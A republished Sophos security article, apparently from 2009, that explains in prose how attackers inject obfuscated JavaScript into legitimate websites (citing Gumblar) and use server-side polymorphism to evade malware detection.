Not all malware detection is created equal
Not all malware detection is created equal
The internet is now the number-one conduit for infecting users with malware. SophosLabs reports that in 2009, 23,500 new infected web pages are discovered every day. That’s one every four seconds or so, four times worse than what it was in the same period in 2008. Malware authors are very successful with a popular method: compromising popular, high-traffic, legitimate sites in order to kick-start the infection process .
Users visiting a hijacked site have no way of knowing the site has been compromised because the malicious code is invisible but executed as soon as the page loads in the user’s browser. The code typically will utilize cross-site scripting to fetch an even more malicious payload from a third-party site that will then attempt to leverage one of dozens of known exploits in the browser or operating system to infect it, steal data or subvert it into a botnet.
The scope of these attacks cannot be underestimated, since all types of sites—from government websites to educational establishments to popular news portals, blogs and social networking sites—have been targeted.
As security vendors add detection for this kind of malicious web code, the attackers constantly evolve it in order to evade being caught. As this game of cat and mouse intensifies, the attackers have turned to using JavaScript for delivering their attacks. Why?:
»»JavaScript is very powerful and universal with rich capabilities supported in all browsers and operating systems.
»»JavaScript provides great flexibility for them to hide (or obfuscate) the malicious code.
Consequently, proactive generic detection becomes harder to achieve. We have seen numerous mass-defacement attacks during 2009 in which tens of thousands of legitimate sites have been compromised (their pages injected with malicious JavaScript code). These attacks invariably use heavily obfuscated JavaScript as a means of evading detection for as long as possible.
A good example of this attack is known as Gumblar, in which many sites were injected with a malicious script that used simple character substitution to hide its payload. As you can see, the payload is not visible in the injected script. But after manual deobfuscation, the payload is obvious —loading of a malicious script from a remote site.
The reach of mass-defacement attacks like such as Gumblar can be huge. Very quickly after adding detection (as Troj/JSRedir-R), that threat quickly rose to the top position in SophosLabs’ web threat stats, dwarfing other threats at that time.
Commercial script packers
There is nothing malicious in obfuscating JavaScript code. In fact, there are commercial tools available that individuals can use in order to obfuscate their code. Why?:
»»Protection of intellectual property: Users may choose to use such tools to obfuscate their code in an attempt to prevent others from copying it.
»»Efficiency: Some tools can produce smaller scripts that are quicker to download, resulting in more responsive sites.
This creates yet another problem for analysts and content scanners. When attackers use commercial tools to obfuscate their malicious scripts, anti-malware analysts have to be careful not to generate a false positive on legitimate scripts that are obfuscated with the same tool.
Server-side polymorphism (SSP)
Many of today’s threats also use advanced scripting techniques on the server in order to create polymorphic malicious code. For example, during 2009, SophosLabs identified several attacks aiming to infect users with Zbot that were aggressively using SSP. In these attacks, the malicious scripts being used to exploit vulnerabilities on user machines were dynamically created on the server, resulting in a slightly different script on each request.
SSP is essentially a special case of obfuscation, which again poses a challenge to anti-malware analysts and content scanners.
This article was provided by Sophos and is reproduced here with their full permission. Sophos provides full data protection services including: security software, encryption software, antivirus, and malware. Article Source:http://www.articlesbase.com/security-articles/not-all-malware-detection-is-created-equal-1584944.html